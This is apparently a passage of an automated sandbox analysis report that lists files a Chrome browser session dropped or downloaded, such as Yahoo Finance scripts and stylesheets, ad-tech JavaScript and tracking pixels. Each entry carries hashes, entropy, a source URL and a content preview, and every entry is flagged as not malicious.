                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:978C8B03E97680EB62057A7000F6E7FD97FB9658
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C40AA69F0B306CEA296DD1193C334BC0781587ED51AAB579C0433698BA9E0C4B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BC6ECF7B39E2C5882C693072A7F541A7C03117A28D14067FED6FDAB6BD455FD8E79C6FE9B81FDF327E64814B91ACEE6F9C1A62134C32CF39731477B712466F38
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:Method Not Allowed.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1308)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1309
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.04998942349745
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:q1GtZcefjJR94XPMbq51Q1FPrl/fTqRZ7sCtwohVpWjRXHKycvn:yG5rJ4hDklLgsArXW9XHXcvn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:4354A9DD51B6388DB42CC727D8C12B14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2AE13E9A82AA3F90C6A30282D2B7106FD56F640C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:7F8A1F695701338EC89F58773C2E0D986A47D6AEA3DE0CCE8D72BCACFCF192C2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:0BF433F14FECCA7C1200463696F9158DFCC89C60887FD60291C1268699EE584838777C59AD16E9B97ADC1557FDD8FB27C5B001BACEE569AD56CDFD07A63F9BB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:const c='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19.43 12.98c.04-.32.07-.64.07-.98s-.03-.66-.07-.98l2.11-1.65c.19-.15.24-.42.12-.64l-2-3.46a.5.5 0 0 0-.61-.22l-2.49 1c-.52-.4-1.08-.73-1.69-.98l-.38-2.65A.49.49 0 0 0 14 2h-4c-.25 0-.46.18-.49.42l-.38 2.65c-.61.25-1.17.59-1.69.98l-2.49-1a.6.6 0 0 0-.18-.03c-.17 0-.34.09-.43.25l-2 3.46c-.13.22-.07.49.12.64l2.11 1.65c-.04.32-.07.65-.07.98s.03.66.07.98l-2.11 1.65c-.19.15-.24.42-.12.64l2 3.46a.5.5 0 0 0 .61.22l2.49-1c.52.4 1.08.73 1.69.98l.38 2.65c.03.24.24.42.49.42h4c.25 0 .46-.18.49-.42l.38-2.65c.61-.25 1.17-.59 1.69-.98l2.49 1q.09.03.18.03c.17 0 .34-.09.43-.25l2-3.46c.12-.22.07-.49-.12-.64zm-1.98-1.71c.04.31.05.52.05.73s-.02.43-.05.73l-.14 1.13.89.7 1.08.84-.7 1.21-1.27-.51-1.04-.42-.9.68c-.43.32-.84.56-1.25.73l-1.06.43-.16 1.13-.2 1.35h-1.4l-.19-1.35-.16-1.13-1.06-.43c-.43-.18-.83-.41-1.23-.71l-.91-.7-1.06.43-1.27.51-.7-1.21 1.08-.84.89-.7-.14-1.13c-.03-.31-.05-.54-.05-.74s.02-.43.05-.73l.14-1.13-.89-.7-1.08
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65509)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):940793
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.353000247859796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:RPn9O8VI15IVkDc1qME1w7riubkaYcNWV/dWnFOqvIplzohhcgZS9jhyz9yeL0Zq:pn9dVI15IVkDc1qME1w7riubkaYcNWVw
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:23703603A780B95BCB99F247A3D1D835
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:6C4E409B96C4298C7AB5BAD0C0CC1660E48CC2BF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:90AA5A867A4608CD7A914C28CF8BFA96E9A7DF96EEB1BFA7BDE1F057B57B61AC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D2EC1A07961C995925B89FC8E97CA0FB5E412E03B9060064F0B90256B59E1C4A4ED331CA45A8C718BEEB781B46C92C76789B3B250E10439A8E4A6B8505CE020F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:/*! 20241006-3-RELEASE */..!function(e){e.TRC=e.TRC||{},e.TRC.sharedObjects=e.TRC.sharedObjects||{},e.TRC.sharedObjects.loadedScripts=e.TRC.sharedObjects.loadedScripts||{},e.TRC.sharedObjects.loadedPixels=e.TRC.sharedObjects.loadedPixels||{}}(window),function(){var win,doc;((e,t,r)=>{const i="trc_modal_hidden",o="trc_modal_mask",n="trc_modal_dialog",a="trc_close_modal",s=t.createElement("div"),l=t.createElement("div");let c,d="";function p(){u(l,i),u(s,i),r.dom.off(t,"keyup",m),r.dom.off(t,"click",g),r.dom.off(t.getElementById(a),"click",g),r.dom.off(e,"message",b)}function h(){u(l,o),u(l,i),u(s,n),u(s,i),w.appendChild(l),w.appendChild(s),t.body.appendChild(R),y(d),c=!0}const u=function(e,t){if(e.classList)return e.classList.add(t);r.dom.removeClass(e,t),e.className+=` ${t}`},m=e=>{const t=e.which||e.keyCode;27===t&&p()},g=e=>{const t=e.target||e.srcElement;t!==l&&t.id!==a||(r.dom.stopEvent(e),p())},b=e=>{/http(s)?:\/\/www\.taboola\.com/.test(e.origin)&&e.data&&1025==+e.data&&p()},f=fu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (32043)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):34882
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.428172874886598
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:+pxyiYGAdU1sahkgF58HF+XZky13RekzWkb99QuKjk:0yFUickgnsF+pky13RHXMRjk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:39D7FEA8EE427CFF64304A5288CB61F8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:9855642C4D93C0C5F23BB896B0A22ECB13E2FBEF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:FA85A4366200F608A99ECF4B1B933BABDD9C5662CBE5D518B3DAA57E53DBD85B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:FD66459E82D8CE7A8903899CCC3B92E350195DBB530E4967877DF5F3557CE385666769C4E9AB71E87BA135347B928542160075A5C54706E6E71E6B46D85DF4FD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://playercdn.jivox.com/1700114009/unit/js/gz/velocity-raf-disabled.min.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:/*! VelocityJS.org (1.2.2). (C) 2014 Julian Shapiro. MIT @license: en.wikipedia.org/wiki/MIT_License */./*! VelocityJS.org jQuery Shim (1.0.1). (C) 2014 The jQuery Foundation. MIT @license: en.wikipedia.org/wiki/MIT_License. */.!function(e){function t(e){var t=e.length,r=$.type(e);return"function"===r||$.isWindow(e)?!1:1===e.nodeType&&t?!0:"array"===r||0===t||"number"==typeof t&&t>0&&t-1 in e}if(!e.jQuery){var $=function(e,t){return new $.fn.init(e,t)};$.isWindow=function(e){return null!=e&&e==e.window},$.type=function(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?a[o.call(e)]||"object":typeof e},$.isArray=Array.isArray||function(e){return"array"===$.type(e)},$.isPlainObject=function(e){var t;if(!e||"object"!==$.type(e)||e.nodeType||$.isWindow(e))return!1;try{if(e.constructor&&!n.call(e,"constructor")&&!n.call(e.constructor.prototype,"isPrototypeOf"))return!1}catch(r){return!1}for(t in e);return void 0===t||n.call(e,t)},$.each=function(e,r,a){var n,o=0,i=e.length,s=t(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://dns-aup3nb5p0.sombrero.yahoo.net/pixel.gif
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):120089
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.553601607103306
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:QuWBYfYHjKHFHR0MPYDY9jKh2qOmailkPIXYcYyjKeuPymaiC:DWBYfYHjaFHRBPYDY9jxqJXYcYyj/uPW
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:445603916FD57F4FE772B2305B36B4A0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:620785F4C199AF1844C6389B4965D970B4A04763
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:7363F53C1BAB823092D605231A1AFC4336559C966CF338278C35A6394A8F670B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:9636B0D6FE24634C8E9E8C083CDBC24F8A79B1516AAAE8FBF816E71F212A5C19A9F7B45B75006335C2C1B958CFC254D734DFFFA9BECE23A3FE9DC9A6420FB2F1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:{"items":[{"data":{"partnerData":{"adMeta":{"hashtag":"news;entertainment","isSupplySegment":"false","lang":"en-US","region":"US","rs":"lmsid:a0a6T00000MOZxjQAH;revsp:billboard_547;lpstaid:53c53b29-181a-3610-abb6-7342d7ac1416;pt:content;pd:modal;ver:megastrm;pct:story","site_attribute":"wiki_topics=\"Plastic_surgery;Cardi_B;Hourglass_figure\" ctopid=\"1035500\" hashtag=\"news;1035500\" rs=\"lmsid:a0a6T00000MOZxjQAH;revsp:billboard_547;lpstaid:53c53b29-181a-3610-abb6-7342d7ac1416;pt:content;pd:modal;ver:megastrm;lu:0;pct:story\"","spaceid":"1197792446","site":"entertainment","enabled":true,"pos":"","showBodyAds":false,"showPhotoAds":false},"alias":"ymedia-alias:shadow=cardi-b-shows-off-her-170246496","canonicalSite":"entertainment","canonicalUrl":"https://www.billboard.com/music/music-news/cardi-b-slams-plastic-surgery-rumors-photo-video-1235794470/","categoryLabel":"Celebrity","commentsAllowed":true,"commentsCount":0,"contentMeta":{"adPostions":{"photos":{},"INARTICLE":5},"bodySlots":{
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (851)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):852
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.010469710944666
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:slHVNmseK2ORe+XPAFYiCIKV2kxAFY6IKTRC2pAfRyjkHE2drb:yVUwLe+33VTxe38QY9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:EABBCE78DC4FD8416C5C1ECEDAE40B82
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:0915344D1447FF9AD482B751C1B08DB8A315398A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:3E888EF396625064DB9F06ACD8AE5A58ED5890AD095785EE9B20B7AFFB13C531
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:28573434D439194910D7C57B537A0BCDBB1AAC7FCC33783F53A5BEFAB4DD2CEF4D07B8600FAF8383D76E5F74A59E3D46D4849A8C1DE6C61B62D83E808F8B64C5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/assets/GradientScale.BwfNrsj8.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.gradientScale.yf-1sfyzm6.yf-1sfyzm6{display:flex;align-items:center;gap:var(--space-0);width:100%}.gradientScale.alignRight.yf-1sfyzm6.yf-1sfyzm6{justify-content:flex-end}.gradientScale.yf-1sfyzm6 .item.yf-1sfyzm6{max-width:3.5rem;width:14.2857142857%}.gradientScale.yf-1sfyzm6 .item:first-of-type .colorSwatch.yf-1sfyzm6{border-bottom-left-radius:4px;border-top-left-radius:4px}.gradientScale.yf-1sfyzm6 .item:last-of-type .colorSwatch.yf-1sfyzm6{border-bottom-right-radius:4px;border-top-right-radius:4px}.gradientScale.yf-1sfyzm6 .item:not(:last-of-type) .colorSwatch.yf-1sfyzm6{border-right:1px solid var(--surface1)}.gradientScale.yf-1sfyzm6 .item .colorSwatch.yf-1sfyzm6{width:100%;height:12px}.gradientScale.yf-1sfyzm6 .item p.yf-1sfyzm6{font-size:var(--font-s);font-weight:var(--font-normal);min-width:100%;line-height:125%;text-align:center}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):152004
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.464929062207595
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3072:N5T3YK06DQWzOAgMTivhTt9kPyzpnsH+Nm5v5:LT3YK0WzOKWv94KdnA+m5v5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:1851E0328DB85FEA057B73B59CD718F0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:BFB526478D292EDF6AB10985BB354DDFE67DCD7C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:43B83FEC9342E0E8BB67E6AC615CA6BB60F802F012514215F41FE4663F6CD189
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:28CF01910F77F0692D3C363633567F466DFC14669F3B32C684BD008EB76CC6DA2B49F01976A4B901DE3B5C4B66456F359630C288F214B7EA67FE1AF60CC7D771
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/commonUtil.CI22_Irn.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:var zn=Object.defineProperty;var qn=(n,t,e)=>t in n?zn(n,t,{enumerable:!0,configurable:!0,writable:!0,value:e}):n[t]=e;var d=(n,t,e)=>(qn(n,typeof t!="symbol"?t+"":t,e),e),Xn=(n,t,e)=>{if(!t.has(n))throw TypeError("Cannot "+e)};var fe=(n,t,e)=>{if(t.has(n))throw TypeError("Cannot add the same private member more than once");t instanceof WeakSet?t.add(n):t.set(n,e)};var w=(n,t,e)=>(Xn(n,t,"access private method"),e);import{E as Tt}from"./scheduler.Dr9AAxFe.js";import{g as yt}from"./stores.DPDRpTFd.js";import{b as Jn,w as Er}from"./43.CtYdpA_T.js";const _r=(()=>{try{return window.localStorage.setItem("test","test"),window.localStorage.removeItem("test"),!0}catch{return!1}})(),Qn=(n,t)=>{if(!n||!t)return!1;const e=/^\/($|community)/;return e.test(n)&&e.test(t)},bt={DESKTOP:"desktop",TABLET:"tablet",SMARTPHONE:"smartphone"};class Tr{constructor(t){d(this,"innerState");d(this,"innerStore");this.innerState=this.getInitialState(),this.innerStore=t(this.innerState,this.startStopNotifier),this.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (980)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):981
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.986153703943162
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:nPGenVRrLyLHBLOJYGBJOAQURHyt75WyNp06trLy3gpARE4VBLOtIARHwK9:JVR6LH9OJYGnUay7763tLV9OtxQe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:2992AF77013EA63FDE4C37D4430DC59F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8628DDC01240495D701820358CB4E4BBAC42FA58
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:5BD1BF5CA8E16834D2B555C177FAD216229F4A7923806D770AECF3C41910DB45
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:9D18A76A62C419EF08C3B404464CD97E389CDC45AEE798D78A9CA3AD5B4514B7AE39388650E1DF09D742B1B6E4AB2BB9626C4AE9E31E1578814EB97F3EF05F33
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/assets/AdGroup.53S-Eidu.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.sdaContainer.yf-sxbwsx{margin:.8rem 0;justify-content:center;overflow-x:hidden;display:flex;align-items:center}.sdaContainer.dv-desktop.yf-sxbwsx,.sdaContainer.dv-tablet.yf-sxbwsx,.sdaContainer.dv-smartphone.yf-sxbwsx{display:none}.sdaContainer.hidden.yf-sxbwsx{display:none!important}.sdaContainer.visible.yf-sxbwsx{display:flex}.sdaContainer.placeholder.yf-sxbwsx{overflow:hidden;min-height:var(--placeholder-height)}.sdaContainer[class*=LDRB].yf-sxbwsx,.sdaContainer[class*=LREC].yf-sxbwsx{min-height:250px;overflow:hidden}.sdaContainer[class*=LDRB].yf-sxbwsx{box-sizing:content-box}.sdaContainer.overflow.yf-sxbwsx{overflow:visible}@media only screen and (min-width: 1050px){.sdaContainer.dv-desktop.yf-sxbwsx{display:flex}}@media only screen and (min-width: 768px) and (max-width: 1049px){.sdaContainer.dv-tablet.yf-sxbwsx{display:flex}}@media only screen and (max-width: 767px){.sdaContainer.dv-smartphone.yf-sxbwsx{display:flex;height:-moz-max-content;height:max-content}}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (1911)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1912
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.25724670362897
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:NldzXyQ3tjzY1boftAZbq0GjRi4iVRSr4c1fQv44zgF:fNXntjzY96UbR8W7FRv44zy
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:65D5557FE56B960823F6ECECE8CF41B7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:CA73EBCF155CC9566F81AEAA76134C3252A4C406
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:E77C06E8DD9CF3B2DBE40E1269171F44C3AEC19B9D1019474B55A8DF6C31C558
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:CA5BF109A03DA07F783636BCFFF912D64C350C54279DF701151681D313CE96A7D7B0ACC7CB41B218E88A42932783234A7289BDA98A7397754FB8718AFDDCA84B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/loadSparkline.P-xwuGpq.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{e as P,d as b,j as A,I as w,J as E}from"./commonUtil.CI22_Irn.js";import{f as k,l as g}from"./logUtil.hOue7iAU.js";async function C(n,o){var l;const{type:i="performance",pfId:f,silent:p=!1,range:m="1d",interval:h="2m",symbol:u}=o,[a,[s]]=await Promise.all([P(n),b(["portfolio"],n)]);if(!A(a)||!((l=a.user)!=null&&l.guid)||i==="quotePerformance"&&!u)return;const t={end:"2",start:"1"};f&&i==="performance"?t.pfId=f:i==="quotePerformance"&&(t.symbol=u),typeof o.start=="number"&&typeof o.end=="number"?(t.start=o.start.toString(),t.end=o.end.toString()):(t.interval=h,t.range=m);try{const r=await k(n,{crumb:!0,pathname:`/ws/portfolio-timeseries-api/v2/portfolio/${i}/chart`,perfLabel:"getPerformanceChart",query:t,timeout:5e3});if(!p){const d=w(r==null?void 0:r.chart);s.updatePerformanceChart({chart:d,pfId:f})}return r}catch(r){throw g(n,o,{data:r,perfLabel:"getPerformanceChart"}),p||s.setError(E),r}}async function I(n,o){var d;const{interval:i="5m",indicators:f="close",includeTimestamps:p
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (913)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):914
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.264277132285632
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:jpd8qJGpAjGpAISr6cjaMOvM6bFu1IMBLt3CTgM94ctRD:jp+4kur/a1k6fTgG4ct5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:1FD70179761FDF78FADDE8C139B3D8BF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:3BE09A0866C5098B3E373A466C8727346DFF5CEA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B384D480521A4AA2916EBFB0FC238BDF7837A57B6651FEC7FC70E21006CFA431
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:21EE4C75D6512C8ECD18DE3E2EFFCD8B45B55E82E7D210A3920FC37A23CC06980D45A4BECD22CFE729E705EBFAF023572F97E4976B6182D185BBE183D90DD474
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/each.BExQfwb4.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{a as q,t as z}from"./index.DCSmZEjO.js";import{v as B}from"./scheduler.Dr9AAxFe.js";function F(n){return(n==null?void 0:n.length)!==void 0?n:Array.from(n)}function G(n,f){n.d(1),f.delete(n.key)}function H(n,f){q(n,1,1,()=>{f.delete(n.key)})}function I(n,f,k,C,x,g,h,A,p,_,w,j){let i=n.length,d=g.length,c=i;const a={};for(;c--;)a[n[c].key]=c;const l=[],u=new Map,m=new Map,v=[];for(c=d;c--;){const e=j(x,g,c),s=k(e);let t=h.get(s);t?v.push(()=>t.p(e,f)):(t=_(s,e),t.c()),u.set(s,l[c]=t),s in a&&m.set(s,Math.abs(c-a[s]))}const M=new Set,S=new Set;function y(e){z(e,1),e.m(A,w),h.set(e.key,e),w=e.first,d--}for(;i&&d;){const e=l[d-1],s=n[i-1],t=e.key,o=s.key;e===s?(w=e.first,i--,d--):u.has(o)?!h.has(t)||M.has(t)?y(e):S.has(o)?i--:m.get(t)>m.get(o)?(S.add(t),y(e)):(M.add(o),i--):(p(s,h),i--)}for(;i--;){const e=n[i];u.has(e.key)||p(e,h)}for(;d;)y(l[d-1]);return B(v),l}export{G as d,F as e,H as o,I as u};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (15896), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):15896
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.503616373683869
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:GGJ01yJn5yOIVmxV/ZUN/4hDEwu85wWoJNmpPvIE:GGJ00JngOCyZ+8l2Wush
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C73E0CB111244BC0796DA0E83348068B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:C83D2843508D6BA4827C2DCA0670FFBDD4F1E4ED
